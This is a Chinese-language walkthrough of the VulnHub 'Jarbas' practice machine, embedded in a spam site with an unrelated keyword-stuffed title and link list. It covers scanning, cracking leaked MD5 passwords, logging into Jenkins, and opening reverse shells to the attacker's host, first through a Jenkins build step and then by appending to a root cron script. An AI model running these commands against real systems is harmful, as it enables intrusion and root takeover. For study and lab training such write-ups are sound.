当前位置: 首页 > news >正文

不花钱可以做网站吗欧美网站建设公司

不花钱可以做网站吗,欧美网站建设公司,专业做皮草的网站,个人装修接活群文章目录 信息收集主机发现端口扫描目录爆破 漏洞探测whatwebhash-identifierwhatweb 文档说明:https://www.vulnhub.com/entry/jarbas-1,232/ 靶机下载:Download (Mirror): 信息收集 主机发现 扫描C段 sudo nmap -sn 10.9.75.0/24端口扫描 sudo nma…

文章目录

    • 信息收集
      • 主机发现
      • 端口扫描
      • 目录爆破
    • 漏洞探测
      • whatweb
      • hash-identifier
      • whatweb

文档说明:https://www.vulnhub.com/entry/jarbas-1,232/

靶机下载:Download (Mirror):

信息收集

主机发现

扫描C段

sudo nmap -sn 10.9.75.0/24

image-20231125131716854

端口扫描

sudo nmap --min-rate 10000 10.9.75.10

image-20231125131847664

详细扫描服务版本,系统

sudo nmap -sT -sV -O -p 22,80,3306,8080 10.9.75.10 

image-20231125132007149

目录爆破

dirsearch -u http://10.9.75.10 -i 200  

image-20231125132323184

漏洞探测

whatweb

访问80端口

image-20231125132425330

whatweb http://10.9.75.10

image-20231125133245051

并没有识别到类似的CMS内容管理系统,

继续访问access.html发现了类似用户名:加密后的密码的东西

image-20231125132945210

hash-identifier

可以使用工具来验证加密类型

hash-identifier "5978a63b4654c73c60fa24f836386d87"  

image-20231125133052923

拿去在线网站进行md5解密

image-20231125133516690

image-20231125133605822

image-20231125133636880

tiago:italia99

trindade:marianna

eder:vipsu

访问8080端口

image-20231125134737788

whatweb

whatweb http://10.9.75.10:8080

image-20231125134830353

指纹识别出一个Jenkins的CMS管理系统

尝试使用上面解密出来的密码进行登陆

使用eder:vipsu登陆成功!

image-20231125135041152

image-20231125135104467

新建一个任务

image-20231125135842524

选择第一个自由风格软件项目就可以,然后往下翻,点击确定

点击Build构建

image-20231125135948173

由于目标系统是linux系统,所以选择第二个execute shell

/bin/bash >& /dev/tcp/10.9.75.3/6868 0>&1#反弹到kali上

点击应用,然后点击保存

image-20231125140121483

这个时候kali先监听6868端口

nc  -lvvp 6868  

回到页面上点击立即构建

image-20231125140412821

就反弹到kali机器上了

image-20231125140529852

页面上会显示有一个任务正在运行

image-20231125140547563

我们拿到shell是没有回显的,可以通过python获取显示shell

python -c "import pty;pty.spawn('/bin/bash')"

image-20231125140911530

最后再计划任务里找到了以root运行 的程序

image-20231125141047389

查看文件内容

cat /etc/script/CleaningScript.sh

image-20231125141328159

可以在里面添加反弹shell,

echo "/bin/bash >& /dev/tcp/10.9.75.3/6869 0>&1" >> /etc/script/CleaningScript.sh

image-20231125141432284

kali监听6869端口,等待反弹

image-20231125141555084

Jenkins 的漏洞利用方式有很多,可以自行去网上查阅相关资料

http://www.tj-hxxt.cn/news/98627.html

相关文章:

  • 网站的二级页面怎么做成都计算机培训机构排名前十
  • 中国电力工程造价信息网百度seo教程
  • 淮安建设网站制作短期培训就业学校
  • 做百度网站如何收费百度拍照搜题
  • 注册博客域名做视频网站会怎么样今日热点新闻排行榜
  • 网站建设意义网站站长seo推广
  • 自己建立网站用什么软件网站建设方案书模板
  • 官网查询网站推广百度百科
  • 网站keywords标签怎么写seo视频教程百度网盘
  • 旅游微网站分销淘宝seo优化排名
  • 什么网站可以做设计赚钱博客推广工具
  • 运城做网站的公司今日国内热点新闻头条事件
  • 广州专业网站设计互联网域名注册查询
  • 网站主色调有几种5118
  • 做招聘网站毕业设计太原百度seo排名软件
  • 网站价格评估 优帮云seo竞价培训
  • 吉林seo排名公司优化推广什么意思
  • 衢州做网站最新的网络营销方式
  • 南充做网站电话怎样查询百度收录和排名情况
  • 做网站怎样找信息流投放
  • 鄂州手机网站建设正规推广平台有哪些
  • 如何做推广麦当劳的网站水果店推广营销方案
  • 广州网上注册公司网站怎么让网站快速收录
  • wordpress dx南宁seo优势
  • wordpress esc html xseo网站有优化培训吗
  • saas系统是干嘛的南京seo优化公司
  • vs2012做网站百度小程序
  • 美女做暖网站深圳刚刚突然宣布
  • 网站建设是平面设计吗线上推广网络公司
  • vs2017 做网站新闻早知道